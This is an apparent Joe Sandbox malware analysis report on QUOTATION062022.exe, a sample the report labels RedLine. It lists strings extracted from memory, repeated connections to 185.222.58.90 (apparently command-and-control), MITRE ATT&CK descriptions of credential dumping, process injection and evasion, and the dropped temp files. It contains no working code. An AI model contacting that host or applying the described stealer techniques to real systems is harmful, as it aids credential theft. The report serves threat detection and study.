Source: QUOTATION062022.exe, 00000000.00000002.294290970.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, vbc.exe, 00000004.00000002.377531030.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000004.00000000.279823172.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Data.exe, 0000000B.00000002.361910499.0000000003ACA000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.482951667.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.339858194.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: QUOTATION062022.exe, 00000000.00000002.294290970.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, vbc.exe, 00000004.00000002.377531030.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000004.00000000.279823172.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Data.exe, 0000000B.00000002.361910499.0000000003ACA000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.482951667.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.339858194.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.380668992.000000000787C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.348177158.000000000A99B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp, tmp98B9.tmp.4.dr, tmpC472.tmp.4.dr, tmp5452.tmp.23.dr, tmpD9D7.tmp.23.dr, tmp69EB.tmp.4.dr, tmpC64C.tmp.23.dr, tmpD369.tmp.23.dr, tmp151F.tmp.23.dr, tmp22C0.tmp.23.dr, tmp1759.tmp.4.dr, tmpBA00.tmp.4.dr, tmpA820.tmp.23.dr, tmp53EE.tmp.4.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.380668992.000000000787C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.348177158.000000000A99B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp, tmp98B9.tmp.4.dr, tmpC472.tmp.4.dr, tmp5452.tmp.23.dr, tmpD9D7.tmp.23.dr, tmp69EB.tmp.4.dr, tmpC64C.tmp.23.dr, tmpD369.tmp.23.dr, tmp151F.tmp.23.dr, tmp22C0.tmp.23.dr, tmp1759.tmp.4.dr, tmpBA00.tmp.4.dr, tmpA820.tmp.23.dr, tmp53EE.tmp.4.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.380668992.000000000787C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp, tmp98B9.tmp.4.dr, tmpC472.tmp.4.dr, tmp5452.tmp.23.dr, tmpD9D7.tmp.23.dr, tmp69EB.tmp.4.dr, tmpC64C.tmp.23.dr, tmpD369.tmp.23.dr, tmp151F.tmp.23.dr, tmp22C0.tmp.23.dr, tmp1759.tmp.4.dr, tmpBA00.tmp.4.dr, tmpA820.tmp.23.dr, tmp53EE.tmp.4.dr, tmpE68F.tmp.23.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: vbc.exe, 00000004.00000003.348177158.000000000A99B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab1
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.380668992.000000000787C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.348177158.000000000A99B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp, tmp98B9.tmp.4.dr, tmpC472.tmp.4.dr, tmp5452.tmp.23.dr, tmpD9D7.tmp.23.dr, tmp69EB.tmp.4.dr, tmpC64C.tmp.23.dr, tmpD369.tmp.23.dr, tmp151F.tmp.23.dr, tmp22C0.tmp.23.dr, tmp1759.tmp.4.dr, tmpBA00.tmp.4.dr, tmpA820.tmp.23.dr, tmp53EE.tmp.4.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://get.adob
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://helpx.ad
Source: vbc.exe, vbc.exe, 00000004.00000002.377531030.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000004.00000000.279823172.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Data.exe, 0000000B.00000002.361910499.0000000003ACA000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.482951667.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.339858194.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.380668992.000000000787C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.348177158.000000000A99B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp, tmp98B9.tmp.4.dr, tmpC472.tmp.4.dr, tmp5452.tmp.23.dr, tmpD9D7.tmp.23.dr, tmp69EB.tmp.4.dr, tmpC64C.tmp.23.dr, tmpD369.tmp.23.dr, tmp151F.tmp.23.dr, tmp22C0.tmp.23.dr, tmp1759.tmp.4.dr, tmpBA00.tmp.4.dr, tmpA820.tmp.23.dr, tmp53EE.tmp.4.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.380668992.000000000787C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.348177158.000000000A99B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp, tmp98B9.tmp.4.dr, tmpC472.tmp.4.dr, tmp5452.tmp.23.dr, tmpD9D7.tmp.23.dr, tmp69EB.tmp.4.dr, tmpC64C.tmp.23.dr, tmpD369.tmp.23.dr, tmp151F.tmp.23.dr, tmp22C0.tmp.23.dr, tmp1759.tmp.4.dr, tmpBA00.tmp.4.dr, tmpA820.tmp.23.dr, tmp53EE.tmp.4.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_java
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.380668992.000000000787C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.348177158.000000000A99B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp, tmp98B9.tmp.4.dr, tmpC472.tmp.4.dr, tmp5452.tmp.23.dr, tmpD9D7.tmp.23.dr, tmp69EB.tmp.4.dr, tmpC64C.tmp.23.dr, tmpD369.tmp.23.dr, tmp151F.tmp.23.dr, tmp22C0.tmp.23.dr, tmp1759.tmp.4.dr, tmpBA00.tmp.4.dr, tmpA820.tmp.23.dr, tmp53EE.tmp.4.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: QUOTATION062022.exe	Virustotal: Detection: 47%			Perma Link
Source: QUOTATION062022.exe	ReversingLabs: Detection: 48%

Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report QUOTATION062022.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Data.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QUOTATION062022.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vbc.exe.log

C:\Users\user\AppData\Local\Temp\tmp151F.tmp

C:\Users\user\AppData\Local\Temp\tmp1759.tmp

C:\Users\user\AppData\Local\Temp\tmp22C0.tmp

C:\Users\user\AppData\Local\Temp\tmp39BB.tmp

